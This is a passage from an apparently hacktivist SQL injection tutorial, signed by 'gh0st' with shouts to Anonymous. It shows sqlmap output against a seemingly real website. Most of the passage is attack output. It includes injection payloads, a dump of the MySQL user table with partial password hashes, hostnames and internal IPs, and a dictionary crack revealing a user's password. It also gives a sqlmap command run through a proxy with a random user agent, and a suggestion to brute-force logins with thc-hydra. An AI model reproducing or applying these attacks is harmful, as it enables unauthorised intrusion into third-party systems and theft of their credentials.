732. [18:49:05] [INFO] testing connection to the target url
733. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
734. ---
735. Place: GET
736. Parameter: id
737. Type: boolean-based blind
738. Title: AND boolean-based blind - WHERE or HAVING clause
739. Payload: id=6 AND 8517=8517
740.  
741. Type: error-based
742. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
743. Payload: id=6 AND (SELECT 1834 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,111,114,58),(SELECT (CASE WHEN (1834=1834) THEN 1 ELSE 0 END)),CHAR(58,103,97,109,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
744.  
745. Type: AND/OR time-based blind
746. Title: MySQL > 5.0.11 AND time-based blind
747. Payload: id=6 AND SLEEP(5)
748. ---
749.  
750. [18:49:17] [INFO] manual usage of GET payloads requires url encoding
751. [18:49:17] [INFO] the back-end DBMS is MySQL
752.  
753. web application technology: Apache
754. back-end DBMS: MySQL 5.0
755. [18:49:17] [INFO] fetching columns for table 'user' on database 'mysql'
756. [18:49:18] [INFO] the SQL query used returns 37 entries
757. [18:49:18] [INFO] suppressing possible resume console info because of large number of rows (might take too much time)
758. [18:49:20] [INFO] retrieved: max_user_connections
759. [18:49:22] [INFO] retrieved: int(11) unsigned
760. [18:49:23] [INFO] retrieved: max_connections
761. [18:49:24] [INFO] retrieved: int(11) unsigned
762. [18:49:25] [INFO] retrieved: max_updates
763. [18:49:27] [INFO] retrieved: int(11) unsigned
764. [18:49:28] [INFO] retrieved: max_questions
765. [18:49:30] [INFO] retrieved: int(11) unsigned
766. [18:49:31] [INFO] retrieved: x509_subject
767. [18:49:34] [INFO] retrieved: blob
768.  
769. I HAVE REMOVED SOME OF INFORMATION TO KEEP THE TUTORIAL SIZE DOWN!
770.  
771. [18:51:32] [INFO] retrieved: localhost
772. [18:51:33] [INFO] retrieved: root
773. [18:51:35] [INFO] retrieved: N
774. [18:51:37] [INFO] retrieved:
775. [18:51:38] [INFO] retrieved: *2F1FBE78A7A4C9CA6F239A4C12D2F6B16B
776. [18:51:39] [INFO] retrieved: N
777. [18:51:41] [INFO] retrieved: N
778. [18:51:42] [INFO] retrieved: N
779. [18:51:46] [INFO] retrieved:
780. [18:51:47] [INFO] retrieved:
781. [18:51:49] [INFO] retrieved: N
782. [18:54:08] [INFO] retrieved: Y
783. [18:54:09] [INFO] retrieved: localhost
784. [18:54:11] [INFO] retrieved:
785. [18:54:12] [INFO] retrieved: Y
786. [18:54:14] [INFO] retrieved:
787. [18:54:15] [INFO] retrieved: *605A60BF6EFC17C157CF1E34F576F35BFD80
788. [18:54:16] [INFO] retrieved: Y
789. [18:57:28] [INFO] retrieved: projects
790. [18:57:29] [INFO] retrieved: Y
791. [18:57:31] [INFO] retrieved:
792. [18:57:33] [INFO] retrieved: *B012E8731FF1DF44F3D8B26837708985278C
793. [18:57:34] [INFO] retrieved: Y
794.  
795. recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]
796. [19:09:16] [INFO] using hash method: 'mysql_passwd'
797. what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
798. [19:10:00] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
799. do you want to use common password suffixes? (slow!) [y/N] N
800. [19:10:13] [INFO] starting dictionary attack (mysql_passwd)
801. [19:10:13] [INFO] found: 'password' for hash: '*e56a114692fe0de073f9a1dd68a00eeb9703'
802. [19:10:13] [INFO] found: 'password' for user: 'projects'
803. Database: mysql
804. Table: user
805. [25 entries]
806.  
807. +------------+--------------------+-------------+---------------------+-----------------------+------------------+------------------+-------------+-----------+--------------+-----------+------------+---------------------------------+------------+-------------+------------------+-----------------+---------------+-------------+----------------------+-----------------------------------------------------+--------------+-----------------+-------------+------------------+-----------------+-------------+--------------+----------------+---------------+------------+----------+------------+-------------+----------------+-------------+--------------+
808. | Alter_priv | Alter_routine_priv | Create_priv | Create_routine_priv | Create_tmp_table_priv | Create_user_priv | Create_view_priv | Delete_priv | Drop_priv | Execute_priv | File_priv | Grant_priv | Host | Index_priv | Insert_priv | Lock_tables_priv | max_connections | max_questions | max_updates | max_user_connections | Password | Process_priv | References_priv | Reload_priv | Repl_client_priv | Repl_slave_priv | Select_priv | Show_db_priv | Show_view_priv | Shutdown_priv | ssl_cipher | ssl_type | Super_priv | Update_priv | User | x509_issuer | x509_subject |
809. +------------+--------------------+-------------+---------------------+-----------------------+------------------+------------------+-------------+-----------+--------------+-----------+------------+---------------------------------+------------+-------------+------------------+-----------------+---------------+-------------+----------------------+-----------------------------------------------------+--------------+-----------------+-------------+------------------+-----------------+-------------+--------------+----------------+---------------+------------+----------+------------+-------------+----------------+-------------+--------------+
810. | N | N | N | N | N | N | N | N | N | N | N | N | localhost | N | N | N | 0 | 0 | 0 | 0 | *2F1FBE78A7A4C9CA6F239A4C12D2F6B16B8D5 | N | N | N | N | N | N | N | N | N | NULL | NULL | N | N | root | NULL | NULL |
811. | N | N | N | N | N | N | N | N | N | N | N | N | localhost | N | N | N | 0 | 0 | 0 | 0 | *CF9EBDBEB7E917593C84F8FA6CA1D13E289F5F | N | N | N | N | N | N | N | N | N | NULL | NULL | N | N | panel | NULL | NULL |
812. | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | N | localhost | Y | Y | N | 0 | 0 | 0 | 0 | *E784A49C8C7340D14CBFEC6181911832FB | N | N | N | N | N | Y | Y | Y | N | NULL | NULL | N | Y | graber | NULL | NULL |
813. | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | localhost | Y | Y | Y | 0 | 0 | 0 | 0 | *605A60BF6EFC17C157CF1E34F576F35B | Y | Y | Y | Y | Y | Y | Y | Y | Y | NULL | NULL | Y | Y | NULL | NULL | NULL |
814. | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | ic-earth-ny.indexcopernicus.com | Y | Y | Y | 0 | 0 | 0 | 0 | *6A511966616CD43C35166A81BC2AC01F7 | Y | Y | Y | Y | Y | Y | Y | Y | Y | NULL | NULL | Y | Y | root | NULL | NULL |
815. | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | N | ic-earth-ny.indexcopernicus.com | Y | Y | N | 0 | 0 | 0 | 0 | *E56A114692FE0DE073F9A1DD68A00EEB9703F3 | N | N | N | N | N | Y | Y | Y | N | NULL | NULL | N | Y | NULL | NULL | NULL |
816. | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | N | 10.11.12.1 | Y | Y | N | 0 | 0 | 0 | 0 | *5917878B1F04F5E4B9815B2056B340F87CD477 | N | N | N | N | N | Y | Y | Y | N | NULL | NULL | N | Y | root | NULL | NULL |
817. | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | N | 10.11.12.1 | Y | Y | N | 0 | 0 | 0 | 0 | *B012E8731FF1DF44F3D8B26837708985278C3C | N | N | N | N | N | Y | Y | Y | N | NULL | NULL | N | Y | projects | NULL | NULL |
818. | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | 10.11.12.1 | Y | Y | Y | 0 | 0 | 0 | 0 | *7742916D8C9524F7826938F0A5F1FB499 | Y | Y | Y | Y | Y | Y | Y | Y | Y | NULL | NULL | Y | Y | panel | NULL | NULL |
819. | N | N | N | N | N | N | N | N | N | N | N | N | 10.11.12.1 | N | N | N | 0 | 0 | 0 | 0 | *16F2DA51526C51873E29386679D394E20ADA48 | N | N | N | N | N | N | N | N | N | NULL | NULL | N | N | lowersuser | NULL | NULL |
820. | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | N | 10.11.12.1 | Y | Y | N | 0 | 0 | 0 | 0 | *854BA136D598D180847EC4689EB51C618239A | N | N | N | N | N | Y | Y | Y | N | NULL | NULL | N | Y | graber | NULL | NULL |
821.  
822. +------------+--------------------+-------------+---------------------+-----------------------+------------------+------------------+-------------+-----------+--------------+-----------+------------+---------------------------------+------------+-------------+------------------+-----------------+---------------+-------------+----------------------+-----------------------------------------------------+--------------+-----------------+-------------+------------------+-----------------+-------------+--------------+----------------+---------------+------------+----------+------------+-------------+----------------+-------------+--------------+
823.  
824. [19:10:20] [INFO] Table 'mysql.user' dumped to CSV file '/pentest/database/sqlmap/output/www.indexHIDEN.com/dump/mysql/user.csv'
825. [19:10:20] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.indexHIDEN.com'
826.  
827. [*] shutting down at: 19:10:20
828.  
829.  
830. YES!!!!
831.  
832. Okay as you can see sqlmap was able to determine the user login names and find the encrypted has passwords. It will ask us if we want to try and do a brute force password
833. crack attempt and ofcourse we will choose yes!!!
834.  
835. NOTE: i have removed a lot of the users and have deleted a good chunk of the encryped password and i will not be posting passwords on this tutorial, sorry!
836.  
837.  
838. Can you now see why this is such a great tool!
839.  
840. For those of you who have been doing your sqlinjection attacks manually, i hope you can now see the value in such a great tool!
841.  
842. We now have login names and passwords that we can use against our target! And if you get unlucky and you are not able to get the full encrypted password you are still lucky
843. in knowing what login names are used for the target network, and you could use an app like thc-hydra to try and get the passwords for the login names. Just a suggestions...
844.  
845.  
846. Okay very quickly i will go over one last option with sqlmap for now because i am getting tired...
847.  
848. the option:
849.  
850. --wizard
851.  
852. the option --wizard will give you a gui interface to use sqlmap..
853.  
854.  
855. Here is a quick example..
856.  
857. root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" --wizard
858.  
859. sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
860. http://sqlmap.sourceforge.net
861.  
862. [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
863.  
864. [*] starting at: 19:51:46
865.  
866. POST data (--data) [Enter for None]: --data
867. Injection difficulty (--level/--risk). Please choose:
868. [1] Normal (default)
869. [2] Medium
870. [3] Hard
871. > 1
872. Enumeration (--banner/--current-user/etc). Please choose:
873. [1] Basic (default)
874. [2] Smart
875. [3] All
876. > 3
877.  
878. sqlmap is running, please wait..
879.  
880. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
881. ---
882. Place: GET
883. Parameter: id
884. Type: boolean-based blind
885. Title: AND boolean-based blind - WHERE or HAVING clause
886. Payload: id=6 AND 8517=8517
887.  
888.  
889. Okay well i hope you have found this tutorial helpful..and i will be adding more later i promise. I will get into more details. Also i plan to have a tutorial out on sqlninja!
890. Be on the look out for that.
891.  
892. Well i hope it helps!
893.  
894. Take care my brothers...
895.  
896. BIG SHOUTS TO ANONYMOUS...
897.  
898. irc.anonymous.li
899. #antisec
900.  
901.  
902. Tutorial by gh0st